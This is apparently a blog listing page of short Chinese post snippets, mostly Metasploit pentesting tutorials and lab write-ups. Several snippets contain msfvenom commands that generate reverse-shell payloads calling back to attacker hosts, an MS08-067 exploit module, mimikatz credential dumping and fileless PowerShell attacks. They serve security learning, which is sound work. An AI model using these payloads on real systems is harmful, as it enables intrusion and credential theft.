- 2024-12-222024/12月 读书笔记 - 7《构建之法》--- 第七章
微软解决方案框架(MSF)概述本章将探讨微软公司推荐的软件开发方法——微软解决方案框架(MSF),它融合了多种软件开发方法论和原则,旨在指导微软的软件开发实践。MSF的核心原则开放沟通:确保所有信息透明共享,涉及所有相关角色,并公开决策过程。同时,对敏感信息如技术机密和安全性信息采取
- 2024-12-1913-MSF常见漏洞复现
1、MS08-067、MS10-018漏洞复现,对比bind和reverse攻击模式的区别MS08-067环境:使用kali中的MSF工具攻击WindowsXP开启msfconsole,搜索MS08-067漏洞,进入漏洞利用模块msfconsolesearchms08-067useexploit/windows/smb/ms08_067_netapi查看配置项showoptions设
- 2024-11-29C++_Linux二进制格式
C++调试工具GDB适合用于调试代码逻辑错误和程序崩溃,二者结合使用可以大大提高错误排查效率Valgrind和Memcheck更适合用于检查程序的内存问题,如内存泄漏、非法内存访问等。GFlags是VS中自带的内存检查工具gprof是一个GNU项目中的性能分析工具,用于分析C和C++程序的
- 2024-10-17【工具使用】MSF使用_MSF中kiwi(mimikatz)模块
一、简介:kiwi模块:mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。二、前提:1.提权到system权限当前权限是administrator用户若不是,需要利用其他手段先提权到administrator用户。然后adminis
- 2024-09-18Metasploit Framework (MSF) 使用指南 - 第一篇:介绍与基础用法
引言MetasploitFramework(MSF)是一款功能强大的开源安全漏洞检测工具,被广泛应用于渗透测试中。它内置了数千个已知的软件漏洞,并持续更新以应对新兴的安全威胁。MSF不仅限于漏洞利用,还包括信息收集、漏洞探测和后渗透攻击等多个环节,因此被安全社区誉为“可以黑掉整个宇宙”的工具。
- 2024-09-05ATT&CK红队评估(红日靶场1)
前言博主小白一个,各位大佬勿喷,前前后后,学了挺久的,学了之后又忘了,因此来打红日靶场1巩固知识。文章写的不是很好,缺少很多细节,博主也是内网小白,很多都不懂,互相学习靶机介绍本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下:http://vulnstack.qiy
- 2024-08-28【MSF系列】使用meterpreter从linux系统下载文件到kali
成功拿到了shell,在/var/www/html/cacti底下有个sql文件,将其下载下来命令download/path/to/file.txt/opt/downloads/file.txt下载后导入本地,可以获得登录密码+----+----------+----------------------------------+-------+---------------+---------------+--------------
- 2024-08-11【MSF系列】命令合集
###生成payloadmsfvenom-pwindows/meterpreter/reverse_winhttpsLHOST=39.97.167.211LPORT=6667--platformwindows-ax86HandLerSSLCert=./my.pemStagerVerifySSLCert=true-s42--smallest-ex86/shikata_ga_nai-i9-fraw|msfvenom--platformwindows-ax86
- 2024-08-10MSF及Windows渗透测试
一、MetasploitFramework原理Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合
- 2024-08-09【kali系列】Metasploit Framework (MSF) 从基础到进阶使用指南
引言一、MetasploitFramework介绍1.1MSF概述1.2MSF主要组件二、MetasploitFramework基础安装与配置2.1KaliLinux中的MSF2.2非KaliLinux环境下的安装2.3更新与升级三、MetasploitFramework基础用法3.1启动MSF控制台
- 2024-07-19【攻防技术系列+PowerShell】无文件落地攻击
#红队#MSF#powershell虚拟机环境搭建:【Kali】,192.168.10.131【win7】,192.168.10.134接上文:【攻防技术系列】MSF进程迁移,用的是里面的1.exe。如果遇到端口占用情况,可以采用以下解决方案:之后在【win7】中使用powershell执行以下命令,实现无文件落地攻击powershell-nop
- 2024-07-16【攻防技术系列】MSF进程迁移
#Msfvenom#进程迁移#pid虚拟机环境搭建【Kali】,192.168.10.131【win7】,192.168.10.134一、MSF进程迁移1.1手动迁移migratepid或者migrate-N应用名字[推荐:explorer.exe]1.2自动迁移setautorunscriptmigrate-nexplorer.exe或者使用默认迁移的setautor
- 2024-07-05CobaltStrike的内网安全
1.上线机器的Beacon的常用命令2.信息收集和网站克隆3.钓鱼邮件4.CS传递会话到MSF5.MSF会话传递到CS1上线机器的Beacon的常用命令介绍:CobaltStrike分为服务端和客户端,一般我们将服务端放在kali,客户端可以在物理机上面,或者虚拟机都可以启动服务端,首先创建一个监听(注意,这
- 2024-06-14MSF渗透使用说明
实验环境前提:对方的445端口必须开放,首先要保证是能够访问到目标机器的,那么我们先ping一下目标机器,看网络是否连通如果无法ping的话,对方机器必须要关闭防火墙,或许有其他方法在对方开启防火墙的情况下访问到对方?目前采用关闭防火墙使用工具:kali
- 2024-06-13红日复现为什么失败之struct漏洞复现
struts2漏洞一、指纹识别s2的url路径组成(详见struts.xml配置文件):name工程名+namespace命名空间+atcion名称+extends拓展名部署在根目录下,工程名可为空;当然namespace名称也可设置为空;拓展名也可设置为空。方法一(1)url会有.action或.do后缀文件名(eg:http://192.168.xx.xx/integ
- 2024-06-08记一次msf反弹shell小错误
使用MSF生成后门程序,反弹shell设置攻击机IP和端口,生成后门程序sudomsfvenom-pwindows/meterpreter/reverse_tcplhost=172.24.4.7lport=4444-fexe-oattack.exe设置监听模块打开msfconsole使用以下命令设置监听模块msfconsoleuseexploit/multi/handlerset